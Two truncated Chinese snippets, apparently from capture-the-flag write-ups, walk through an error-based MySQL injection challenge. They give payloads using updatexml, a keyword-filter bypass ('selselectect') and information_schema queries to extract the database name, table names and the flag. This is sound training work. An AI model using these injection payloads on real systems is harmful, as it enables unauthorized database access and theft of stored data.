说明我们的sql语句被进行了某种替换,导致语法错误。尝试 name=test'and updatexml(1,concat(0x7e,(selselectect(1)from dual)),1)#&pass=xxxx时发现回显正常 于是使用报错注入获取表名和列名,即可得到flag。 name=test'and updatexml(1,concat(0x7e,(selselectect(group_concat(table_name))from information_sch...
tips=1 开启mysql错误提示,使用burp发包就可以看到啦--> 可知本题考察报错注入 1.尝试获取当前数据库的库名 name=xxx' and updatexml(1,concat(0x7e,(select database()),0x7e),1)--+&pass=xxx 2.获取表名 name=xxx' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_s...